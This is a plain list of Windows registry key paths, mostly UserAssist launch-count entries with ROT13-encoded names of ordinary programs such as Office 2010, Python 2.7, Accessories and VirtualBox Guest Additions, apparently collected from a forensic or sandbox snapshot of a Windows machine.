HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Benpyr\IveghnyObk Thrfg Nqqvgvbaf\havafg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\NccQngn\Ybpny\Grzc\~afh.gzc\Nh_.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\jvaire.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Clguba27\clgubaj.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{7SR8Q22N-SO1Q-N8OR-01R3-6P8693961R6R}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.VagreargRkcybere.64Ovg
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pzq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qbjaybnqf\Nhgbehaf64.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P1P6S8NP-40N3-0S5P-146S-65N9QP70OOO4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jrypbzr Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\qvfcynlfjvgpu.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Pnyphyngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fgvpxl Abgrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Favccvat Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Cnvag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\KCF Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Snk naq Fpna.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Erzbgr Qrfxgbc Pbaarpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Zntavsl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Jbeq 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Rkpry 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bhgybbx 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg CbjreCbvag 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg BarAbgr 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqbor Ernqre 9.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Benpyr IZ IveghnyObk Thrfg Nqqvgvbaf\Havafgnyy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Vagrearg Rkcybere (64-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Gnfx Fpurqhyre.yax
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInstrumentation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Vagrearg Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\HRZR_PGYPHNPbhag:pgbe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Pbzznaq Cebzcg.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Abgrcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Jvaqbjf Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Aneengbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Ba-Fperra Xrlobneq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Flfgrz Gbbyf\Cevingr Punenpgre Rqvgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npebong.pbz.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zrqvn Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fvqrone.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Nalgvzr Hctenqr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf QIQ Znxre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Zrqvn Cynlre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zngu Vachg Cnary.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zbovyvgl Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\ArgjbexCebwrpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fbhaq Erpbeqre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flap Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jbeqcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Npprffvovyvgl\Fcrrpu Erpbtavgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Punenpgre Znc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\qsethv.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Qvfx Pyrnahc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Erfbhepr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Vasbezngvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Erfgber.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre Ercbegf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\FuncrPbyyrpgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\GnoGvc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\Jvaqbjf Wbheany.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy (k86).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR (k86).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzcbarag Freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzchgre Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Qngn Fbheprf (BQOP).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Rirag Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\vFPFV Vavgvngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Zrzbel Qvntabfgvpf Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cresbeznapr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cevag Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Frphevgl Pbasvthengvba Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Flfgrz Pbasvthengvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Jvaqbjf Sverjnyy jvgu Nqinaprq Frphevgl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Jvaqbjf CbjreFuryy Zbqhyrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Perngr Erpbirel Qvfp.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Erzbgr Nffvfgnapr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Qvtvgny Pregvsvpngr sbe ION Cebwrpgf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Pyvc Betnavmre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Bssvpr 2010 Ynathntr Cersreraprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Bssvpr 2010 Hcybnq Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Bssvpr Cvpgher Znantre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Bssvpr Nalgvzr Hctenqr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 2.7\VQYR (Clguba THV).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 2.7\Zbqhyr Qbpf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 2.7\Clguba (pbzznaq yvar).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\abgrcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYPHNPbhag:pgbe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\aneengbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\bfx.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\rhqprqvg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Nqbor\Npebong.pbz\Npebong.pbz.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnPragre
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{Q4N262QQ-PR44-Q105-S36O-9Q77N8PO65N4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfNalgvzrHctenqrHV.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\QIQ Znxre\QIQZnxre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnCynlre32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\zvc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{NN198O3P-PQ8P-7QR1-98Q1-O460S637193O}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\ArgCebw.rkr
